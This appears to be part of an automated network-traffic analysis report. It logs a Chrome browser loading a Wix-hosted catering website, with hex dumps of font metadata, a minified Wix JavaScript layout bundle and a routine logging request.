                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 62 64 22 2c 22 63 64 6e 4e 61 6d 65 22 3a 22 22 2c 22 67 65 6e 65 72 69 63 46 61 6d 69 6c 79 22 3a 22 73 65 72 69 66 22 2c 22 70 72 6f 76 69 64 65 72 22 3a 22 6d 6f 6e 6f 74 79 70 65 22 2c 22 63 68 61 72 61 63 74 65 72 53 65 74 73 22 3a 5b 22 6c 61 74 69 6e 22 5d 2c 22 70 65 72 6d 69 73 73 69 6f 6e 73 22 3a 22 61 6c 6c 22 2c 22 66 61 6c 6c 62 61 63 6b 73 22 3a 22 61 64 6f 62 65 2d 63 61 73 6c 6f 6e 2d 77 30 38 2d 73 6d 62 64 22 2c 22 73 70 72 69 74 65 49 6e 64 65 78 22 3a 32 31 39 2c 22 63 73 73 46 6f 6e 74 46 61 6d 69 6c 79 22 3a 22 61 64 6f 62 65 2d 63 61 73 6c 6f 6e 2d 77 30 31 2d 73 6d 62 64 2c 61 64 6f 62 65 2d 63 61 73 6c 6f 6e 2d 77 30 38 2d 73 6d 62 64 2c 73 65 72 69 66 22 7d 2c 7b 22 64 69 73 70 6c 61 79 4e 61 6d 65 22 3a 22 41 6d 61 74 69 63 20
                                                                                                                                                                                                                        Data Ascii: bd","cdnName":"","genericFamily":"serif","provider":"monotype","characterSets":["latin"],"permissions":"all","fallbacks":"adobe-caslon-w08-smbd","spriteIndex":219,"cssFontFamily":"adobe-caslon-w01-smbd,adobe-caslon-w08-smbd,serif"},{"displayName":"Amatic
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 2c eb 8f 8b ec 9b 80 2c 64 6f 74 75 6d 2c 68 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 22 7d 2c 7b 22 64 69 73 70 6c 61 79 4e 61 6d 65 22 3a 22 41 72 69 61 6c 20 42 6c 61 63 6b 22 2c 22 66 6f 6e 74 46 61 6d 69 6c 79 22 3a 22 61 72 69 61 6c 20 62 6c 61 63 6b 22 2c 22 63 64 6e 4e 61 6d 65 22 3a 22 22 2c 22 67 65 6e 65 72 69 63 46 61 6d 69 6c 79 22 3a 22 73 61 6e 73 2d 73 65 72 69 66 22 2c 22 70 72 6f 76 69 64 65 72 22 3a 22 73 79 73 74 65 6d 22 2c 22 63 68 61 72 61 63 74 65 72 53 65 74 73 22 3a 5b 22 6c 61 74 69 6e 22 2c 22 6c 61 74 69 6e 2d 65 78 74 22 2c 22 63 79 72 69 6c 6c 69 63 22 5d 2c 22 70 65 72 6d 69 73 73 69 6f 6e 73 22 3a 22 61 6c 6c 22 2c 22 66 61 6c 6c 62 61 63 6b 73 22 3a 22 61 72 69 61 6c 2d 77 30 31 2d 62 6c 61 63 6b 2c 61 72
                                                                                                                                                                                                                        Data Ascii: ,,dotum,helvetica,sans-serif"},{"displayName":"Arial Black","fontFamily":"arial black","cdnName":"","genericFamily":"sans-serif","provider":"system","characterSets":["latin","latin-ext","cyrillic"],"permissions":"all","fallbacks":"arial-w01-black,ar
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 74 69 6e 22 5d 2c 22 70 65 72 6d 69 73 73 69 6f 6e 73 22 3a 22 61 6c 6c 22 2c 22 66 61 6c 6c 62 61 63 6b 73 22 3a 22 61 76 65 6e 69 72 2d 6c 74 2d 77 30 35 5f 38 35 2d 68 65 61 76 79 22 2c 22 73 70 72 69 74 65 49 6e 64 65 78 22 3a 32 31 36 2c 22 63 73 73 46 6f 6e 74 46 61 6d 69 6c 79 22 3a 22 61 76 65 6e 69 72 2d 6c 74 2d 77 30 31 5f 38 35 2d 68 65 61 76 79 31 34 37 35 35 34 34 2c 61 76 65 6e 69 72 2d 6c 74 2d 77 30 35 5f 38 35 2d 68 65 61 76 79 2c 73 61 6e 73 2d 73 65 72 69 66 22 7d 2c 7b 22 64 69 73 70 6c 61 79 4e 61 6d 65 22 3a 22 41 76 65 6e 69 72 20 4c 69 67 68 74 22 2c 22 66 6f 6e 74 46 61 6d 69 6c 79 22 3a 22 61 76 65 6e 69 72 2d 6c 74 2d 77 30 31 5f 33 35 2d 6c 69 67 68 74 31 34 37 35 34 39 36 22 2c 22 63 64 6e 4e 61 6d 65 22 3a 22 22 2c 22 67 65
                                                                                                                                                                                                                        Data Ascii: tin"],"permissions":"all","fallbacks":"avenir-lt-w05_85-heavy","spriteIndex":216,"cssFontFamily":"avenir-lt-w01_85-heavy1475544,avenir-lt-w05_85-heavy,sans-serif"},{"displayName":"Avenir Light","fontFamily":"avenir-lt-w01_35-light1475496","cdnName":"","ge
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 4c 69 67 68 74 22 2c 22 66 6f 6e 74 46 61 6d 69 6c 79 22 3a 22 62 61 72 6c 6f 77 2d 65 78 74 72 61 6c 69 67 68 74 22 2c 22 63 64 6e 4e 61 6d 65 22 3a 22 42 61 72 6c 6f 77 22 2c 22 67 65 6e 65 72 69 63 46 61 6d 69 6c 79 22 3a 22 73 61 6e 73 2d 73 65 72 69 66 22 2c 22 70 72 6f 76 69 64 65 72 22 3a 22 67 6f 6f 67 6c 65 2d 73 65 6c 66 2d 68 6f 73 74 65 64 22 2c 22 63 68 61 72 61 63 74 65 72 53 65 74 73 22 3a 5b 22 6c 61 74 69 6e 22 2c 22 6c 61 74 69 6e 2d 65 78 74 22 5d 2c 22 70 65 72 6d 69 73 73 69 6f 6e 73 22 3a 22 61 6c 6c 22 2c 22 66 61 6c 6c 62 61 63 6b 73 22 3a 22 62 61 72 6c 6f 77 22 2c 22 73 70 72 69 74 65 49 6e 64 65 78 22 3a 32 33 39 2c 22 63 73 73 46 6f 6e 74 46 61 6d 69 6c 79 22 3a 22 62 61 72 6c 6f 77 2d 65 78 74 72 61 6c 69 67 68 74 2c 62 61 72
                                                                                                                                                                                                                        Data Ascii: Light","fontFamily":"barlow-extralight","cdnName":"Barlow","genericFamily":"sans-serif","provider":"google-self-hosted","characterSets":["latin","latin-ext"],"permissions":"all","fallbacks":"barlow","spriteIndex":239,"cssFontFamily":"barlow-extralight,bar


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        5192.168.2.54971834.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC586OUTGET /services/wix-thunderbolt/dist/8875.46b20782.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1163INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 25545
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: DWONseuZlkMMJ1pV4TUQgIDRUsBohvCT
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 941860598 170287589
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 965707513
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 07:32:05 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 109231
                                                                                                                                                                                                                        Last-Modified: Thu, 09 Jan 2025 07:22:40 GMT
                                                                                                                                                                                                                        ETag: "3420cff8bf368157ef7c715be4697c42"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC227INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 38 37 35 5d 2c 7b 35 38 32 32 33 3a 28 65 2c 74 2c 69 29 3d 3e 7b 69 2e 64 28 74 2c 7b 52 72 3a 28 29 3d 3e 78 2c 41 71 3a 28 29 3d 3e 68 2c 70 37 3a 28 29 3d 3e 76 2c 6a 68 3a 28 29 3d 3e 52 2c 45 48 3a 28 29 3d 3e 24 2c 4b 55 3a 28 29 3d 3e 6c 2c 5f 6f 3a 28 29 3d 3e 61 2c 76 6b 3a 28 29 3d 3e 64 2c 4e 4c 3a 28 29 3d 3e 79 2c 79 4f 3a 28 29 3d 3e 67 7d 29 3b 76
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[8875],{58223:(e,t,i)=>{i.d(t,{Rr:()=>x,Aq:()=>h,p7:()=>v,jh:()=>R,EH:()=>$,KU:()=>l,_o:()=>a,vk:()=>d,NL:()=>y,yO:()=>g});v
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 61 72 20 6e 3d 69 28 31 37 37 30 39 29 2c 73 3d 69 2e 6e 28 6e 29 3b 63 6f 6e 73 74 20 72 3d 28 65 2c 74 2c 69 29 3d 3e 7b 6c 65 74 20 6e 3d 31 2c 73 3d 30 3b 66 6f 72 28 6c 65 74 20 72 3d 30 3b 72 3c 65 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 63 6f 6e 73 74 20 6f 3d 65 5b 72 5d 3b 69 66 28 6f 3e 74 29 72 65 74 75 72 6e 21 31 3b 69 66 28 73 2b 3d 6f 2c 73 3e 74 26 26 28 6e 2b 2b 2c 73 3d 6f 2c 6e 3e 69 29 29 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 2c 6f 3d 28 65 2c 74 2c 69 29 3d 3e 7b 6c 65 74 20 6e 3d 2d 31 2f 30 3b 63 6f 6e 73 74 20 73 3d 65 2e 6d 61 70 28 28 65 3d 3e 28 65 2e 68 65 69 67 68 74 2b 74 3e 6e 26 26 28 6e 3d 65 2e 68 65 69 67 68 74 2b 74 29 2c 65 2e 68 65 69 67 68 74 2b 74 29 29 29 3b 6c 65 74 20 6f 3d 6e 2c 61 3d 6e 2a 65 2e
                                                                                                                                                                                                                        Data Ascii: ar n=i(17709),s=i.n(n);const r=(e,t,i)=>{let n=1,s=0;for(let r=0;r<e.length;r++){const o=e[r];if(o>t)return!1;if(s+=o,s>t&&(n++,s=o,n>i))return!1}return!0},o=(e,t,i)=>{let n=-1/0;const s=e.map((e=>(e.height+t>n&&(n=e.height+t),e.height+t)));let o=n,a=n*e.
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 76 65 64 3d 65 3d 3e 7b 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 77 69 6e 64 6f 77 2e 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 74 68 69 73 2e 63 68 69 6c 64 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 3f 2e 75 6e 6f 62 73 65 72 76 65 28 65 29 7d 2c 74 68 69 73 2e 63 72 65 61 74 65 4f 62 73 65 72 76 65 72 73 3d 28 29 3d 3e 7b 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 4f 62 73 65 72 76 65 72 3d 6e 65 77 20 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 28 28 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 65 5b 30 5d 3b 69 66 28 74 2e 63 6f 6e 74 65 6e 74 52 65 63 74 2e 77 69 64 74 68 21 3d 3d 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 29 7b 69 66 28 30 3d 3d 3d 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 29 72 65 74 75 72 6e 20 76 6f 69
                                                                                                                                                                                                                        Data Ascii: ved=e=>{e instanceof window.HTMLElement&&this.childResizeObserver?.unobserve(e)},this.createObservers=()=>{this.containerWidthObserver=new ResizeObserver((e=>{const t=e[0];if(t.contentRect.width!==this.containerWidth){if(0===this.containerWidth)return voi
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 29 3b 6c 65 74 20 69 3d 70 61 72 73 65 46 6c 6f 61 74 28 74 2e 68 65 69 67 68 74 7c 7c 22 30 22 29 3b 72 65 74 75 72 6e 20 69 2b 3d 70 61 72 73 65 46 6c 6f 61 74 28 74 2e 6d 61 72 67 69 6e 54 6f 70 7c 7c 22 30 22 29 2c 69 2b 3d 70 61 72 73 65 46 6c 6f 61 74 28 74 2e 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 7c 7c 22 30 22 29 2c 7b 68 65 69 67 68 74 3a 69 7d 7d 29 29 7d 73 65 74 49 73 41 63 74 69 76 65 28 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 63 61 6c 63 41 63 74 69 76 65 28 29 3b 74 68 69 73 2e 69 73 41 63 74 69 76 65 21 3d 3d 65 26 26 28 65 3f 74 68 69 73 2e 61 63 74 69 76 61 74 65 28 29 3a 74 68 69 73 2e 64 65 61 63 74 69 76 61 74 65 28 29 29 7d 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 7b 74 68 69 73 2e 63 6c 65 61 6e 55 70 28 29 2c 74
                                                                                                                                                                                                                        Data Ascii: );let i=parseFloat(t.height||"0");return i+=parseFloat(t.marginTop||"0"),i+=parseFloat(t.marginBottom||"0"),{height:i}}))}setIsActive(){const e=this.calcActive();this.isActive!==e&&(e?this.activate():this.deactivate())}connectedCallback(){this.cleanUp(),t
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 61 44 69 6d 65 6e 73 69 6f 6e 73 42 79 45 66 66 65 63 74 28 73 2c 61 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 61 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 28 30 2c 75 2e 63 24 29 28 72 2e 67 65 74 53 63 72 65 65 6e 48 65 69 67 68 74 4f 76 65 72 72 69 64 65 3f 2e 28 29 29 29 3b 74 2e 77 69 64 74 68 3d 6c 2c 74 2e 68 65 69 67 68 74 3d 68 2c 74 2e 63 75 72 72 65 6e 74 53 72 63 3d 6f 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 2c 74 2e 62 67 45 66 66 65 63 74 4e 61 6d 65 3d 6f 2e 64 61 74 61 73 65 74 2e 62 67 45 66 66 65 63 74 4e 61 6d 65 7d 2c 70 61 74 63 68 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 69 2c 6e 2c 73 2c 72 29 7b 63 6f 6e 73 74 20 6f 3d 6e 5b 74 5d 3b 73 2e 74 61 72 67 65 74 57 69 64 74 68 3d 69 2e 77 69 64 74 68 2c 73 2e 74 61 72
                                                                                                                                                                                                                        Data Ascii: aDimensionsByEffect(s,a.offsetWidth,a.offsetHeight,(0,u.c$)(r.getScreenHeightOverride?.()));t.width=l,t.height=h,t.currentSrc=o.style.backgroundImage,t.bgEffectName=o.dataset.bgEffectName},patch:function(t,i,n,s,r){const o=n[t];s.targetWidth=i.width,s.tar
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 72 65 6e 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 73 3d 5b 5d 29 2c 65 2e 72 65 73 69 7a 65 53 65 72 76 69 63 65 2e 6f 62 73 65 72 76 65 43 68 69 6c 64 28 74 2c 74 68 69 73 29 2c 74 68 69 73 2e 63 68 69 6c 64 72 65 6e 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 73 2e 70 75 73 68 28 74 29 7d 75 6e 6f 62 73 65 72 76 65 43 68 69 6c 64 72 65 6e 52 65 73 69 7a 65 28 29 7b 74 68 69 73 2e 63 68 69 6c 64 72 65 6e 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 73 26 26 28 74 68 69 73 2e 63 68 69 6c 64 72 65 6e 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 73 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 65 2e 72 65 73 69 7a 65 53 65 72 76 69 63 65 2e 75 6e 6f 62 73 65 72 76 65 43 68 69 6c 64 28 74 29 7d 29 29 2c 74 68 69 73 2e 63 68 69 6c 64 72 65 6e 52 65 73 69 7a 65 4f 62 73
                                                                                                                                                                                                                        Data Ascii: renResizeObservers=[]),e.resizeService.observeChild(t,this),this.childrenResizeObservers.push(t)}unobserveChildrenResize(){this.childrenResizeObservers&&(this.childrenResizeObservers.forEach((t=>{e.resizeService.unobserveChild(t)})),this.childrenResizeObs
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 29 7d 61 74 74 72 69 62 75 74 65 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 28 65 2c 74 29 7b 74 26 26 74 68 69 73 2e 72 65 4c 61 79 6f 75 74 28 29 7d 64 69 73 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 7b 73 75 70 65 72 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 7d 73 74 61 74 69 63 20 67 65 74 20 6f 62 73 65 72 76 65 64 41 74 74 72 69 62 75 74 65 73 28 29 7b 72 65 74 75 72 6e 5b 22 64 61 74 61 2d 74 69 6c 65 64 2d 69 6d 61 67 65 2d 69 6e 66 6f 22 5d 7d 7d 7d 28 70 28 65 29 2c 74 2c 69 2c 65 29 3b 62 28 65 2c 66 2c 6e 29 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 79 28 65 2c 74 2c 69 3d 77 69 6e 64 6f 77 29 7b 63 6f 6e 73 74 20 6e 3d 7b 77 69 64 74 68 3a 76 6f 69 64 20 30 2c 68 65 69 67 68 74 3a 76 6f 69 64 20 30 2c 6c
                                                                                                                                                                                                                        Data Ascii: )}attributeChangedCallback(e,t){t&&this.reLayout()}disconnectedCallback(){super.disconnectedCallback()}static get observedAttributes(){return["data-tiled-image-info"]}}}(p(e),t,i,e);b(e,f,n)}};function y(e,t,i=window){const n={width:void 0,height:void 0,l
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 74 68 69 73 29 7d 61 74 74 72 69 62 75 74 65 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 28 65 2c 74 29 7b 74 26 26 74 68 69 73 2e 72 65 4c 61 79 6f 75 74 28 29 7d 73 74 61 74 69 63 20 67 65 74 20 6f 62 73 65 72 76 65 64 41 74 74 72 69 62 75 74 65 73 28 29 7b 72 65 74 75 72 6e 5b 22 64 61 74 61 2d 69 73 2d 66 75 6c 6c 2d 68 65 69 67 68 74 22 2c 22 64 61 74 61 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 69 7a 65 22 5d 7d 7d 7d 76 61 72 20 77 3d 69 28 34 32 36 35 38 29 3b 63 6f 6e 73 74 20 43 3d 22 5f 5f 6d 6f 72 65 5f 5f 22 2c 49 3d 22 6d 6f 72 65 43 6f 6e 74 61 69 6e 65 72 22 2c 45 3d 28 65 3d 77 69 6e 64 6f 77 29 3d 3e 7b 63 6f 6e 73 74 20 74 3d 28 65 2c 74 2c 69 2c 6e 2c 73 2c 72 2c 6f 2c 61 29 3d 3e 7b 69 66 28 65 2d 3d 73 2a 28 6f 3f 6e 2e 6c 65 6e 67 74 68
                                                                                                                                                                                                                        Data Ascii: this)}attributeChangedCallback(e,t){t&&this.reLayout()}static get observedAttributes(){return["data-is-full-height","data-container-size"]}}}var w=i(42658);const C="__more__",I="moreContainer",E=(e=window)=>{const t=(e,t,i,n,s,r,o,a)=>{if(e-=s*(o?n.length
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 7b 6d 6f 72 65 43 6f 6e 74 61 69 6e 65 72 4c 65 66 74 3a 64 2c 6d 6f 72 65 43 6f 6e 74 61 69 6e 65 72 52 69 67 68 74 3a 63 7d 7d 29 28 68 2c 61 2c 6e 2c 72 2c 6c 2c 69 2c 64 2c 64 2b 72 2c 74 2e 62 6f 64 79 43 6c 69 65 6e 74 57 69 64 74 68 2c 73 29 3b 72 65 74 75 72 6e 7b 6c 65 66 74 3a 63 2e 6d 6f 72 65 43 6f 6e 74 61 69 6e 65 72 4c 65 66 74 2c 72 69 67 68 74 3a 63 2e 6d 6f 72 65 43 6f 6e 74 61 69 6e 65 72 52 69 67 68 74 2c 74 6f 70 3a 74 2e 6e 65 65 64 54 6f 4f 70 65 6e 4d 65 6e 75 55 70 3f 22 61 75 74 6f 22 3a 60 24 7b 6f 7d 70 78 60 2c 62 6f 74 74 6f 6d 3a 74 2e 6e 65 65 64 54 6f 4f 70 65 6e 4d 65 6e 75 55 70 3f 60 24 7b 6f 7d 70 78 60 3a 22 61 75 74 6f 22 7d 7d 2c 6f 3d 65 3d 3e 21 69 73 4e 61 4e 28 70 61 72 73 65 46 6c 6f 61 74 28 65 29 29 26 26 69
                                                                                                                                                                                                                        Data Ascii: {moreContainerLeft:d,moreContainerRight:c}})(h,a,n,r,l,i,d,d+r,t.bodyClientWidth,s);return{left:c.moreContainerLeft,right:c.moreContainerRight,top:t.needToOpenMenuUp?"auto":`${o}px`,bottom:t.needToOpenMenuUp?`${o}px`:"auto"}},o=e=>!isNaN(parseFloat(e))&&i
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 2c 61 2e 72 69 62 62 6f 6e 45 6c 73 3d 70 61 72 73 65 49 6e 74 28 28 30 2c 77 2e 62 51 29 28 6d 2c 22 72 69 62 62 6f 6e 45 6c 73 22 29 2c 31 30 29 2c 61 2e 6c 61 62 65 6c 50 61 64 3d 70 61 72 73 65 49 6e 74 28 28 30 2c 77 2e 62 51 29 28 6d 2c 22 6c 61 62 65 6c 50 61 64 22 29 2c 31 30 29 2c 61 2e 6d 65 6e 75 42 75 74 74 6f 6e 42 6f 72 64 65 72 3d 70 61 72 73 65 49 6e 74 28 28 30 2c 77 2e 62 51 29 28 6d 2c 22 6d 65 6e 75 62 74 6e 42 6f 72 64 65 72 22 29 2c 31 30 29 2c 61 2e 6d 65 6e 75 49 74 65 6d 43 6f 6e 74 61 69 6e 65 72 4d 61 72 67 69 6e 73 3d 28 74 3d 3e 7b 63 6f 6e 73 74 20 69 3d 74 2e 6c 61 73 74 43 68 69 6c 64 2c 6e 3d 65 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 69 29 3b 72 65 74 75 72 6e 28 70 61 72 73 65 49 6e 74 28 6e 2e 6d 61 72 67
                                                                                                                                                                                                                        Data Ascii: ,a.ribbonEls=parseInt((0,w.bQ)(m,"ribbonEls"),10),a.labelPad=parseInt((0,w.bQ)(m,"labelPad"),10),a.menuButtonBorder=parseInt((0,w.bQ)(m,"menubtnBorder"),10),a.menuItemContainerMargins=(t=>{const i=t.lastChild,n=e.getComputedStyle(i);return(parseInt(n.marg


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        6192.168.2.54972434.149.206.2554435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC643OUTPOST /api/v1/bulklog HTTP/1.1
                                                                                                                                                                                                                        Host: panorama.wixapps.net
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 532
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC532OUTData Raw: 7b 22 6d 65 73 73 61 67 65 73 22 3a 5b 7b 22 66 75 6c 6c 41 72 74 69 66 61 63 74 49 64 22 3a 22 63 6f 6d 2e 77 69 78 70 72 65 73 73 2e 68 74 6d 6c 2d 63 6c 69 65 6e 74 2e 77 69 78 2d 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 49 64 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 70 6c 61 74 66 6f 72 6d 22 3a 22 76 69 65 77 65 72 22 2c 22 6d 73 69 64 22 3a 22 38 66 63 31 31 33 38 63 2d 37 39 62 34 2d 34 65 32 39 2d 62 62 63 30 2d 64 35 35 31 63 36 63 61 37 31 61 66 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 36 30 39 66 30 34 34 31 2d 32 64 38 63 2d 34 36 34 36 2d 38 34 36 65 2d 32 37 38 62 35 34 61 38 66 35 31 39 22 2c 22 73 65 73 73 69 6f 6e 54 69 6d 65 22 3a 35 37 33 2c 22 6c 6f 67 4c 65 76 65 6c 22 3a 22 49 4e 46 4f 22 2c
                                                                                                                                                                                                                        Data Ascii: {"messages":[{"fullArtifactId":"com.wixpress.html-client.wix-thunderbolt","componentId":"thunderbolt","platform":"viewer","msid":"8fc1138c-79b4-4e29-bbc0-d551c6ca71af","sessionId":"609f0441-2d8c-4646-846e-278b54a8f519","sessionTime":573,"logLevel":"INFO",
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1101INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        date: Fri, 10 Jan 2025 13:52:36 GMT
                                                                                                                                                                                                                        x-wix-responded-by: wix.monitoring.panorama.v1.log_entity:BulkLog:com.wixpress.monitoring.panorama
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        x-seen-by: rXUceJIlvIg2Ftogbhjv0L5hQ+m/FZCWRvjudhBpucVEQfi00LSS7LJu7sdkoLsDxoeG309UkCf04PJvOMe9jA==,r6yY0ta7bIKrqK70x072le7w24FVk6wRPZfDsMKqIyc=,bOnBQDOCjWxRPsoIciwTIUSdxV4dlpNeascEzTB59iF7GpfSheMv0/0owJo5qPK8WDOXRj+ap1EiMZLwvJC21g==
                                                                                                                                                                                                                        x-wix-request-id: 1736517156.9042753896939761042651
